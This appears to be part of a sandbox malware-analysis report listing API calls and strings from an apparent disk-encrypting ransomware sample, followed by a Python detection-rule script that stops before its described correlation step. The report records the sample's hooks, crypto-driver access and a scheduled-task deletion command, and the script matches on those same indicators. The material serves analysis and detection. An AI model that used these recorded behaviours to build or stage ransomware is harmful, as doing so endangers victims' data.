                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                              • String ID:
                                              • API String ID: 1445889803-0
                                              • Opcode ID: b5717c3ae1978e90090d18bddf620ebef6e1dda1b2ac5f81843dbc827e59ee84
                                              • Instruction ID: 27aa928488716122c45be10ff05724fc359213b8cf3cc5ea5f0f20163cb8477e
                                              • Opcode Fuzzy Hash: b5717c3ae1978e90090d18bddf620ebef6e1dda1b2ac5f81843dbc827e59ee84
                                              • Instruction Fuzzy Hash: A801AD22B28A4582F7908F21F9506653362FF49BD1F642630EE5E877A0EEBCD984C700
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,00007FF6097557A1,?,?,?,?,00007FF6097542F5,?,?,?,?,00007FF60975365D), ref: 00007FF60975520A
                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6097557A1,?,?,?,?,00007FF6097542F5,?,?,?,?,00007FF60975365D), ref: 00007FF609755218
                                              • SetLastError.KERNEL32(?,?,?,00007FF6097557A1,?,?,?,?,00007FF6097542F5,?,?,?,?,00007FF60975365D), ref: 00007FF609755270
                                                • Part of subcall function 00007FF609757520: Sleep.KERNEL32(?,?,?,00007FF609755233,?,?,?,00007FF6097557A1,?,?,?,?,00007FF6097542F5), ref: 00007FF609757565
                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6097557A1,?,?,?,?,00007FF6097542F5,?,?,?,?,00007FF60975365D), ref: 00007FF609755244
                                              • GetCurrentThreadId.KERNEL32 ref: 00007FF609755258
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue_lock$CurrentSleepThread
                                              • String ID:
                                              • API String ID: 2194181773-0
                                              • Opcode ID: 36c60fb1fc5478d2714b7cf1bc2d67d0d037515c9517970b45afcbe01da3439c
                                              • Instruction ID: a34f9f211ff8872bfb8a287e12c707944f87aac17e1eefcea891980feafb9f00
                                              • Opcode Fuzzy Hash: 36c60fb1fc5478d2714b7cf1bc2d67d0d037515c9517970b45afcbe01da3439c
                                              • Instruction Fuzzy Hash: B2012162E0974282FBD99F75A44507D26A3AF48BE0F284334D91EC23D5EE7CE444C611
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                              • String ID: A$Z
                                              • API String ID: 3686281101-4098844585
                                              • Opcode ID: 7471cf975a6c2e899fc60685f9a1016f05e03f026487ea75407b715c0f360e66
                                              • Instruction ID: e8892fd04278afec063ccfcd91f742043971fb1e64d285f22b02d38a0e3605e3
                                              • Opcode Fuzzy Hash: 7471cf975a6c2e899fc60685f9a1016f05e03f026487ea75407b715c0f360e66
                                              • Instruction Fuzzy Hash: 6F218673F1C6A281EBA05F15A14017976A2EB90BE0FA84131EADD477E5CEACE8C1C700
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$FilePointer
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 566066777-3502785670
                                              • Opcode ID: ae4bdf1545d5b3bea47cb7be4399879195951017214af75440566f936ed4c44c
                                              • Instruction ID: 4f31b962ec4e139f4c4eba070f3608804e8505c9bc196b36e807906998069994
                                              • Opcode Fuzzy Hash: ae4bdf1545d5b3bea47cb7be4399879195951017214af75440566f936ed4c44c
                                              • Instruction Fuzzy Hash: A0111C33B19B4682DB94CF15E84406D73A6FB48BC4B258235DAAC83764EF79D996C700
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 1646373207-3502785670
                                              • Opcode ID: 768c83978b35878a8f958784c4e0d899e0f3712db5d3c7c46bf7aa8f2928ed0d
                                              • Instruction ID: 8451a5be103e507475ec98c021735440de6e25de291eb405c6d73718ad05d218
                                              • Opcode Fuzzy Hash: 768c83978b35878a8f958784c4e0d899e0f3712db5d3c7c46bf7aa8f2928ed0d
                                              • Instruction Fuzzy Hash: 7AF0B452B0564781EEC89F56E4814346362EF48BC4F584134DB0D87754EEBCD098C300
                                              APIs
                                              • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF60975585D,?,?,00000028,00007FF609758D1D,?,?,00000000,00007FF6097574D0,?,?,?,00007FF609757395), ref: 00007FF609755823
                                              • GetProcAddress.KERNEL32(?,?,000000FF,00007FF60975585D,?,?,00000028,00007FF609758D1D,?,?,00000000,00007FF6097574D0,?,?,?,00007FF609757395), ref: 00007FF609755838
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 1646373207-1276376045
                                              • Opcode ID: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
                                              • Instruction ID: ee1154dec472059b24c6f809fa40b4ad7bb6d5773c7e38ab9f66baf031a016e6
                                              • Opcode Fuzzy Hash: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
                                              • Instruction Fuzzy Hash: 18E01212F1974282FE9D5F60A8845341762AF88784B6C1538C81EC63A0EEACB58EC700
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$StringTypemalloc
                                              • String ID:
                                              • API String ID: 4066956681-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: _amsg_exit_getptd$_lock
                                              • String ID:
                                              • API String ID: 3670291111-0

                                              Control-flow Graph

                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00A84084
                                              • GetForegroundWindow.USER32 ref: 00A84090
                                              • GetShellWindow.USER32 ref: 00A8409C
                                              • GetCapture.USER32 ref: 00A840A8
                                              • GetClipboardOwner.USER32 ref: 00A840B4
                                              • GetOpenClipboardWindow.USER32 ref: 00A840C0
                                              • GetCurrentProcessId.KERNEL32 ref: 00A840CC
                                              • GetCurrentThreadId.KERNEL32 ref: 00A840D8
                                              • GetTickCount.KERNEL32 ref: 00A840E4
                                              • GetFocus.USER32 ref: 00A840F0
                                              • GetActiveWindow.USER32 ref: 00A840FC
                                              • GetKBCodePage.USER32 ref: 00A84108
                                              • GetCursor.USER32 ref: 00A84114
                                              • GetLastActivePopup.USER32(?), ref: 00A84127
                                              • GetProcessHeap.KERNEL32 ref: 00A84133
                                              • GetQueueStatus.USER32(000004BF), ref: 00A84144
                                              • GetInputState.USER32 ref: 00A84150
                                              • GetMessageTime.USER32 ref: 00A8415C
                                              • GetOEMCP.KERNEL32 ref: 00A84168
                                              • GetCursorInfo.USER32(?), ref: 00A84193
                                              • GetCaretPos.USER32(?), ref: 00A841A0
                                              • GetCurrentThread.KERNEL32 ref: 00A841C2
                                              • GetThreadTimes.KERNEL32(00000000), ref: 00A841C9
                                              • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00A841EE
                                              • GetProcessTimes.KERNELBASE(00000000), ref: 00A841F1
                                              • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00A841FD
                                              • K32GetProcessMemoryInfo.KERNEL32(00000000), ref: 00A84200
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A8420A
                                              • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00A84214
                                              • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00A8427D
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                              • String ID: ($@
                                              • API String ID: 3079641271-1311469180

                                              Control-flow Graph

                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,00002000,00003000,00000040), ref: 00A842CD
                                                • Part of subcall function 00A82020: TlsGetValue.KERNEL32(?), ref: 00A8202B
                                                • Part of subcall function 00A82020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82043
                                              • VirtualLock.KERNEL32(?,00002000), ref: 00A84307
                                              • GetCurrentThreadId.KERNEL32 ref: 00A84337
                                              • SetWindowsHookExW.USER32(00000007,Function_00003F00,00000000,00000000), ref: 00A84349
                                              • GetCurrentThreadId.KERNEL32 ref: 00A84350
                                              • SetWindowsHookExW.USER32(00000002,Function_00003FC0,00000000,00000000), ref: 00A8435C
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 00A84378
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 00A8438B
                                              • CryptGenRandom.ADVAPI32(?,00000200,?), ref: 00A843A8
                                              • CryptReleaseContext.ADVAPI32(?,000001FF), ref: 00A8440F
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$Context$AcquireCurrentHookThreadVirtualWindows$AllocCreateFileLockRandomReleaseValue
                                              • String ID:
                                              • API String ID: 330245633-0

                                              Control-flow Graph

                                              APIs
                                              • TlsGetValue.KERNEL32(?), ref: 00A8202B
                                              • CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82043
                                              • TlsSetValue.KERNEL32(?,00000000), ref: 00A82062
                                              • DeviceIoControl.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00A82083
                                              • GetLastError.KERNEL32 ref: 00A8208D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ControlCreateDeviceErrorFileLast
                                              • String ID: \\.\dcrypt
                                              • API String ID: 2163648868-1945893055

                                              Control-flow Graph

                                              APIs
                                              • CryptReleaseContext.ADVAPI32(?,000001FF), ref: 00A8440F
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ContextControlCreateCryptDeviceErrorFileLastRelease
                                              • String ID:
                                              • API String ID: 3296926122-0

                                              Control-flow Graph

                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00A8517C
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00A851BB
                                              • GetVersion.KERNEL32 ref: 00A8520A
                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000410), ref: 00A85233
                                              • Sleep.KERNELBASE(00001388), ref: 00A8528A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandFileInitializeModuleNameSleepStringsVersion
                                              • String ID: %ALLUSERSPROFILE%$%PUBLIC%$DECRYPT$\Desktop\DECRYPT.lnk
                                              • API String ID: 789788428-674991135

                                              Control-flow Graph

                                              APIs
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00A83E1A
                                              • GetClientRect.USER32 ref: 00A83E3D
                                              • GetWindowRect.USER32(?,?), ref: 00A83E49
                                              • GetWindowInfo.USER32(?,?), ref: 00A83E55
                                              • GetGUIThreadInfo.USER32(?,?), ref: 00A83E65
                                              • GetWindowTextW.USER32(?,?,00000104), ref: 00A83E79
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Window$InfoRectThread$ClientProcessText
                                              • String ID: 0$<
                                              • API String ID: 2833114922-95265187

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00A857B0: _vswprintf_s.LIBCMT ref: 00A857DB
                                              • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                              • lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryEnvironmentProcessSystemVariable_vswprintf_slstrcat
                                              • String ID: /c %ws$ComSpec$D$\cmd.exe
                                              • API String ID: 306406079-851825698

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00A852D0: GetFileAttributesW.KERNELBASE(C:\Windows\cscc.dat), ref: 00A852DF
                                                • Part of subcall function 00A852D0: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A85301
                                                • Part of subcall function 00A852D0: CloseHandle.KERNEL32(00000000), ref: 00A85309
                                                • Part of subcall function 00A852D0: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A85320
                                                • Part of subcall function 00A852D0: TlsSetValue.KERNEL32(?,00000000), ref: 00A8532E
                                                • Part of subcall function 00A857B0: _vswprintf_s.LIBCMT ref: 00A857DB
                                                • Part of subcall function 00A85810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                                • Part of subcall function 00A85810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                                • Part of subcall function 00A85810: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                                • Part of subcall function 00A85810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              • CreateEventW.KERNEL32(?,00000001,?,?), ref: 00A85704
                                              • SetConsoleCtrlHandler.KERNEL32(Function_00005620,00000001), ref: 00A85716
                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 00A8574E
                                              • Sleep.KERNEL32(00001388), ref: 00A85762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Create$File$AttributesCloseConsoleCtrlDirectoryEnvironmentEventHandleHandlerObjectProcessSingleSleepSystemValueVariableWait_vswprintf_slstrcat
                                              • String ID: -id$rhaegal$schtasks /Delete /F /TN %ws
                                              • API String ID: 2413411667-2713465884

                                              Control-flow Graph

                                              APIs
                                              • GetFileAttributesW.KERNELBASE(C:\Windows\cscc.dat), ref: 00A852DF
                                              • CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A85301
                                              • CloseHandle.KERNEL32(00000000), ref: 00A85309
                                              • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A85320
                                              • TlsSetValue.KERNEL32(?,00000000), ref: 00A8532E
                                                • Part of subcall function 00A847E0: FindFirstVolumeW.KERNEL32(?,00000104), ref: 00A84802
                                                • Part of subcall function 00A847E0: FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00A84889
                                                • Part of subcall function 00A847E0: GetLastError.KERNEL32 ref: 00A8488B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmp
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: File$CreateFindVolume$AttributesCloseErrorFirstHandleLastNextValue
                                              • String ID: C:\Windows\cscc.dat$\\.\dcrypt
                                              • API String ID: 893940839-3761405209
                                              • Opcode ID: 2c3821422c06c3e0936eba70ee6ca48f73759d4fcee32d25ef722a2d081648bd
                                              • Instruction ID: 69da5e490a6b9dbcece3354abf155df845ce4505a0d269b26b04e95187d0f37d
                                              • Opcode Fuzzy Hash: 2c3821422c06c3e0936eba70ee6ca48f73759d4fcee32d25ef722a2d081648bd
                                              • Instruction Fuzzy Hash: BA01AC31BC5B0035E920B7B8AC1BF9536989B05B70F741711FB25EE1E0EAE065074759
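The strings in the two function blocks above are the observables a detection engineer would key on: the task-deletion format `schtasks /Delete /F /TN %ws` next to the name `rhaegal` and the `-id` switch, and the file `C:\Windows\cscc.dat` checked before `\\.\dcrypt` is opened. The rule set below is an added example for this page, not part of the report or of any vendor product: it runs three rules over constructed process- and file-creation events (a simplified key/value rendering, not real telemetry) and correlates hits per host. It assumes, as the co-located strings suggest, that `rhaegal` is the task name substituted for `%ws`, and it takes the image name `dispci.exe` from the report's snapshot file name (`hcaresult_32_2_a80000_dispci.jbxd`); the host names and the numeric value after `-id` are made up.

```python
import re

# Constructed sample telemetry for this example (not from the report): a
# simplified key/value rendering of process-creation and file-creation events.
# Host names and the numeric -id value are made up; the image name dispci.exe is
# assumed from the report's snapshot name (..._dispci.jbxd).
SAMPLE_EVENTS = [
    {"host": "ws01", "kind": "process", "image": r"C:\Windows\dispci.exe",
     "cmdline": r"C:\Windows\dispci.exe -id 4113"},
    {"host": "ws01", "kind": "file", "image": r"C:\Windows\dispci.exe",
     "target": r"C:\Windows\cscc.dat"},
    {"host": "ws01", "kind": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /Delete /F /TN rhaegal"},
    {"host": "ws02", "kind": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /Delete /F /TN NightlyBackup"},    # benign admin use
    {"host": "ws02", "kind": "file", "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\Temp\cscc.dat"},                  # wrong path: no hit
]

# Indicators taken from the report's string lists: the deletion format string
# "schtasks /Delete /F /TN %ws" with the task name "rhaegal" substituted for
# %ws, the "-id" switch, and the file C:\Windows\cscc.dat.
_TASK_DELETE = re.compile(r"\bschtasks(\.exe)?\b.*\s/delete\b.*\s/tn\s+rhaegal\b", re.I)
_ID_SWITCH = re.compile(r"(^|\s)-id(\s|$)", re.I)

RULES = {
    "task_delete_rhaegal": lambda ev: ev["kind"] == "process"
        and bool(_TASK_DELETE.search(ev["cmdline"])),
    "cscc_dat_dropped": lambda ev: ev["kind"] == "file"
        and ev["target"].lower() == r"c:\windows\cscc.dat",
    "dispci_with_id": lambda ev: ev["kind"] == "process"
        and ev["image"].lower().endswith(r"\dispci.exe")
        and bool(_ID_SWITCH.search(ev["cmdline"])),
}


def match_event(ev):
    """Names of the rules a single event satisfies, in rule order."""
    return [name for name, pred in RULES.items() if pred(ev)]


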